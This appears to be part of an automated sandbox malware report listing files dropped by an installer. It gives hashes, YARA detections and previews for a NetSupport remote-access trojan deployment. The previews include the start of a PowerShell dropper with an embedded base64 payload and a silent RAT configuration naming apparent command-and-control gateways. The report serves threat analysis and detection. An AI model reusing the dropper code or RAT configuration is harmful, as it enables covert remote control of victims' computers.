Preview:	L..................F.... .....3'.2...?='.2....7C.[..(............................P.O. .:i.....+00.../C:\.....................1.....hY...PROGRA~2.........O.IhY.....................V......!.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....p.1.....hY...ADVANC~1..X......hY.hY..............................A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.....\|.2.(....T.. .ADVANC~1.EXE..`......hY.hY...............................a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.......q...............-.......p..............a.....C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe..Q.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.?.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.A.d.v.a.n.c.e.d._.I.P._.S.c.a.n.n.e.r...i.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1772
Entropy (8bit):	5.470259736623
Encrypted:	false
SSDEEP:	48:Qgx1WSU4xympgv4RIoUP7mZ9tlNWR831NTx99001dqZ0:QgbLHxv2IfBZXW8n7S01YZ0
MD5:	7CB13C825AC0350A6A19F432BBA03E03
SHA1:	D38B145999851FA429F8CD54FD9C8CCAF40FA6AF
SHA-256:	08B0C3CD16F7A4FBF7E7C2E6387980ABD50B8A66198EA1ED81408CC24A5FE06C
SHA-512:	2DC4FAAEBA6D454F62A8DBE2ABD6A77730C27FBD3107664E2DF9B848EF33BDE86B106EE6DEABE2464083EAD4E783F1DAE8A7ED8300EE39593981996CEE862316
Malicious:	false
Preview:	@...e...........S.......................6.......................P................1]...E.....'.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ycqw5wf.gu2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgvasobb.5aj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvhyz543.2ip.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkieolyc.xx5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp

Download File

Process:	C:\Users\user\Desktop\KC0uZWwr8p.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3305472
Entropy (8bit):	6.576592205223059
Encrypted:	false
SSDEEP:	49152:IdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334Py:6JYVM+LtVt3P/KuG2ONG9iqLRQu3334K
MD5:	77264DBCB409DE0C426BD5088B0FBE09
SHA1:	11C02946EA15EEA615EDE3ED5597ED223D3879CF
SHA-256:	85C71BB847F0B29DB1D790C631D586167942FFCEAE96605F5673438FE3C8DD1A
SHA-512:	5604A2FEE723CEA3238ACA10DD44E1B1A4D5316A1E2C860619E34B9076FEE501E9A9FC22C7E3E3DAD1FDC7690F1992A57778B74B40FE6F3307085549CCFC6A83
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	ASCII text, with very long lines (65339), with CRLF line terminators
Category:	dropped
Size (bytes):	3035738
Entropy (8bit):	5.999270311192215
Encrypted:	false
SSDEEP:	49152:2e6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMi:j
MD5:	E7DB56615C92704E45D5832F1EB94C65
SHA1:	4D36D413E1B76D76A2E0420C70A093BBE460A209
SHA-256:	7E80DDE6044A5AE063E01D834953DEA9EBF6F83F8AE43B2F407EAFC17D6B33C6
SHA-512:	41D807E82D3987FD73107C4CB9A15B5B6992E2FC8F2064D5ED39B88820769EE9236B1D053B419723F89DFA4A0B6EA4D1B6F37AA2334D1542201FF7FB0A6E05A4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1, Author: Joe Security
Preview:	$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$installPath = "$Env:AppData\SystemUtil";..if (Test-Path $installPath) {.. Remove-Item "$Env:AppData\tempDataFile.txt";.. Exit;..};..$encodedData = "UEsDBBQACAAIAPAw5zYAAAAAAAAAAEgBAAAMACAAbnNrYmZsdHIuaW5mVVQNAAd0A49GGaUPZ3QDj0Z1eAsAAQQAAAAABAAAAABVj8GKwkAMhu8D8w5BPG4LHjxJTyu9KEVo2R6WRaZORoPjDGRGi2+/01oLhhxCkv//kg24cO2MjZyTM1JsUkJVww6fnVesoSQbkYfuNGwuFCDtgiGLqQhRWRsgXhDabQklqxv2nq/QkVNMGKSQ4vcHOZB3f1LUdHYq3hmLxbIlp30foGqWCykO7B+kkYuq3g+iFzDLsvlG+PYTEPmNVjH5QjbGqBh581dVk7faJO7upk2N/KATQjE7fs3Vsdcm4Cl+yN/NSb+njhU/p2eSzSpfD/tS/ANQSwcI96jtkdUAAABIAQAAUEsDBBQACAAIAI4MBVcAAAAAAAAAAAMBAAAHACAATlNNLkxJQ1VUDQAHbH3NZGx9zWRsfc1kdXgLAAEEAAAAAAQAAAAALY/RTkIxDIbvm+wd9gLKtoMKml0Chig3xAtDyMkcJSzObukGHt7eM7W9+r82X1NtlBKgBofu44h3XoCAJ7nBuj3nnLjKl+CRCspliHjbZiskZFfxIBNJ3T3qe3kj9Xyi5hOj9EMTtN7tFnRM7HG//439v2hMPlHlFPtE8WrH6zjkwFcrIJDzNVywwfi3jna1fF6v39+mnYAvN5ToLlisVq0EpGKsFpA5Hc6+jlhAQQ4u9pTsZvs668zUzEZ44kCf/Te73OSVHZX2nlUCfgBQSwcIFelrJc4AAAA

C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93560
Entropy (8bit):	6.5461580255883876
Encrypted:	false
SSDEEP:	1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
MD5:	4182F37B9BA1FA315268C669B5335DDE
SHA1:	2C13DA0C10638A5200FED99DCDCF0DC77A599073
SHA-256:	A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
SHA-512:	4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........in.:n.:n.:g.6:\|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.754723001562745
Encrypted:	false
SSDEEP:	6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5:	2D3B207C8A48148296156E5725426C7F
SHA1:	AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256:	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512:	55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\NSM.LIC

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	259
Entropy (8bit):	5.103526864179364
Encrypted:	false
SSDEEP:	6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
MD5:	866C96BA2823AC5FE70130DFAAA08531
SHA1:	892A656DA1EA264C73082DA8C6E5F5728ABCB861
SHA-256:	6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
SHA-512:	0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
Malicious:	true
Preview:	1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..

C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.22028391196942
Encrypted:	false
SSDEEP:	192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5:	A0B9388C5F18E27266A31F8C5765B263
SHA1:	906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:	6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3642864
Entropy (8bit):	6.5156874906689275
Encrypted:	false
SSDEEP:	49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
MD5:	214A714EF11C2C91162A9344BF8F2E50
SHA1:	B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
SHA-256:	74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
SHA-512:	A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..........<G.............-..........q............q.....q......-.Q....,.\|.....................Rich............PE..L.....3V...........!.................^.......................................08.......7.....................................t........ ..P............x7.......6.........................................@...................8x..`....................text............................... ..`.rdata..............................@..@.data....%..........................@....tls.................t..............@....hhshare.............v..............@....rsrc...P.... .......x..............@..@.reloc...,....6......J5.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	459760
Entropy (8bit):	6.678291257338415
Encrypted:	false
SSDEEP:	12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
MD5:	69F72AD2DAD99FF0FBC7F2C671523014
SHA1:	8AAAB0955014B89CA794A51DD527D3AFE6F38A94
SHA-256:	23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
SHA-512:	EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..~..L~..L~..L..pLi..L~..L..Lw.}Ls..L..DL..L..EL6..L..uL...L..tL...L..sL...LRich~..L................PE..L....J.`...........!.....>...r......n7.......P...............................P......1.....@..........................Q..m....D..........@................O.......I...R..............................P&..@............P...............................text...l=.......>.................. ..`.rdata.......P.......B..............@..@.data...H....`.......H..............@....rsrc...@............`..............@..@.reloc...J.......L...h..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	121304
Entropy (8bit):	6.150456878585649
Encrypted:	false
SSDEEP:	768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
MD5:	4F2D0F4A5BA798FA9E85379C7C4BD36E
SHA1:	E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
SHA-256:	AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
SHA-512:	4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..&...&...&.<.{...&...'...&.@."...&...-...&.x. ...&.Rich..&.........PE..L...m1.Q............................ ........ ....@..........................................................................0..<....@..pu..........H................ ..............................................X0...............................text............................... ..`.rdata....... ....... ..............@..@.idata.......0.......0..............@....rsrc...pu...@.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\client32.ini

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	638
Entropy (8bit):	5.396410176198281
Encrypted:	false
SSDEEP:	12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
MD5:	74BEF725496CD35EEB6F6B94E1EDDDFD
SHA1:	616AB761A1429E982062009B5C319F796A60BA1B
SHA-256:	8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
SHA-512:	C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
Malicious:	false
Preview:	0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..

C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\nskbfltr.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\user\AppData\Roaming\SystemUtil\nsm_vpro.ini

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.737780491933496
Encrypted:	false
SSDEEP:	768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:	DCDE2248D19C778A41AA165866DD52D0
SHA1:	7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:	C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SystemUtil\remcmdstub.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	72584
Entropy (8bit):	6.671736046146569
Encrypted:	false
SSDEEP:	1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
MD5:	2A2FC166269EFE48D61CB1AB92215DC2
